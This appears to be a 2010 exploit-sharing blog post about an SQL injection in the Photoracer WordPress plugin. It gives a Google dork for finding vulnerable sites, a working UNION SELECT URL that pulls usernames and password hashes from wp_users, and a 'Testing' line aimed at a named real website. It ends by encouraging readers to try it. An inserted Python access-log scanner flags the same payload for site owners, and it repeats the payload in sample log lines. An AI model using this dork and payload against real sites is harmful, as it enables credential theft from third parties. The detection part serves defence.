Saturday, 11 September 2010

WORDPRESS v1.0 SQL Injection Vulnerability

Dork : inurl:"wp-content/plugins/photoracer/viewimg.php?id="

########################################################

Exploit :
http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI}


Example: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--

Login page : http://[site]/wp-login.php


Testing : http://powersimages.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--
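
For site owners: a log check for the request pattern shown above, written as an added example that is not part of the original post. It scans web-server access-log lines for requests to viewimg.php whose `id` value is not a plain integer. It assumes combined log format; the function names and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script path as given in the post; all other names are assumptions of this example.
VULN_PATH = "/wp-content/plugins/photoracer/viewimg.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(union|select|concat|from|wp_users)\b", re.I)

# Constructed sample lines (documentation-range IPs), combined log format.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Sep/2010:10:01:02 +0700] "GET /wp-content/plugins/photoracer/viewimg.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [11/Sep/2010:10:02:40 +0700] "GET /wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- HTTP/1.1" 200 4890',
    '198.51.100.23 - - [11/Sep/2010:10:02:55 +0700] "GET /blog/wp-content/plugins/photoracer/viewimg.php?id=%2d1%20UNION%20SELECT%201 HTTP/1.1" 200 311',
    '192.0.2.50 - - [11/Sep/2010:10:03:10 +0700] "GET /wp-content/plugins/photoracer/viewimg.php?id=12%27 HTTP/1.1" 200 298',
    '192.0.2.9 - - [11/Sep/2010:10:04:00 +0700] "GET /wp-login.php HTTP/1.1" 200 2210',
]

def classify_id(value):
    """Return 'ok' for a plain non-negative integer, else 'suspicious' or 'sqli'."""
    if re.fullmatch(r"\d{1,10}", value):
        return "ok"
    tokens = {t.lower() for t in SQL_TOKENS.findall(value)}
    # UNION together with SELECT, or any mention of wp_users, is treated as injection.
    if {"union", "select"} <= tokens or "wp_users" in tokens:
        return "sqli"
    return "suspicious"

def scan(lines):
    """Return (client_ip, verdict, decoded_id) for flagged requests to the plugin script."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(VULN_PATH):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, as PHP does for $_GET.
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        for value in ids:
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((line.split(" ", 1)[0], verdict, value))
    return findings

if __name__ == "__main__":
    for ip, verdict, value in scan(SAMPLE_LOG):
        print(f"{verdict:10} {ip:15} id={value!r}")
```

An `sqli` verdict on a request that returned HTTP 200 is a reason to treat the `wp_users` password hashes as exposed and to rotate those credentials.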

Thanks : Devilzc0de Team



Good luck trying it out...
